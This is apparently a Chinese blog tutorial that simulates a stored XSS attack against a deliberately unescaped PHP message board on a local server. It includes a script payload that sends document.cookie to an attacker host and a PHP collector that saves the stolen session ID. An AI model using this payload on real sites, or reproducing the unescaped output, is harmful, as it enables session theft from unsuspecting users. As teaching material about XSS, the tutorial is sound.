php简单模拟基于存储的XSS攻击

原理:将xss攻击代码保存到数据库内,动态显示在web页面上
我们以本地服务器作为被攻击者目标,攻击者服务器为http://phalcon.xyz:8080

1.新建一个文件,命名为message.php

<?php
session_start();
//连接数据库
try {
    $con =  new PDO('mysql:host=127.0.0.1;dbname=xss_message;port=3316', 'root', "111111");
    $con->exec("set names utf8");
} catch (PDOException $e) {
    echo $e->getMessage();
}
try{
    $sql = "SELECT * from `message` ORDER BY id desc";
    $prepare = $con->prepare($sql);
    $prepare->execute();
    $res = $prepare->fetchAll(PDO::FETCH_ASSOC);
}catch (PDOException $e){
    echo $e->getMessage();
}
?>

<!DOCTYPE html>
<html>
<head>
    <title>xss攻击</title>
    <meta charset="utf-8">
</head>
<body>

<form action="form.php" method="post">
    姓名:<input type="text" name="name" id=""><br>
    留言:<textarea rows="4" cols="30" name="message" style="margin-top:5px;"></textarea><br/>
    <input type="submit" name="" value='提交'>
</form>
<br/>留言记录:<br/>
<?php foreach($res as $val){?>
    <?php echo $val['name'];?><span style="color:red"><?php echo $val['message'];?></span><br>
<? }?>

</html>

2.新建一个form.php,用于保存数据

<?php
//连接数据库
try {
    $con =  new PDO('mysql:host=127.0.0.1;dbname=xss_message;port=3316', 'root', "111111");
    $con->exec("set names utf8");
} catch (PDOException $e) {
    echo $e->getMessage();
}
$name = trim($_POST['name']);
$message = trim($_POST['message']);

if(empty($name) or empty($message)){
    header('Location: ./message.php');
    return false;
}
try{
    $sql = "INSERT INTO `message` (`name`,`message`) VALUES (:name,:message)";
    $prepare = $con->prepare($sql);
    $data = $prepare->execute(array(':name'=>$name,':message'=>$message));
    header('Location: ./message.php');
}catch (PDOException $e){
    echo $e->getMessage();
}
?>

3.往留言框里嵌入非法代码

<script>
    var Str=document.cookie;
    var a =document.createElement('a');
    a.href='http://phalcon.xyz:8080/getCookie.php?'+Str;
    a.innerHTML="<img src='./aa.jpg'>";
    document.body.appendChild(a);
</script>

点击提交插入数据库

查看源码

<html>
<head>
    <title>xss攻击</title>
    <meta charset="utf-8">
</head>
<body>

<form action="form.php" method="post">
    姓名:<input type="text" name="name" id=""><br>
    留言:<textarea rows="4" cols="30" name="message" style="margin-top:5px;"></textarea><br/>
    <input type="submit" name="" value='提交'>
</form>
<br/>留言记录:<br/>
    xss:<span style="color:red"><script>
    var Str=document.cookie;
    var a =document.createElement('a');
    a.href='http://phalcon.xyz:8080/getCookie.php?'+Str;
    a.innerHTML="<img src='./aa.jpg'>";
    document.body.appendChild(a);
</script></span><br>
    1111<span style="color:red">222</span><br>

</html>

4.在攻击者服务器获取sessionId

<?php
$cookie=$_GET['PHPSESSID'];
file_put_contents('xss.txt',$cookie);
?>

当用户点击图片时,sessionID将被盗

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值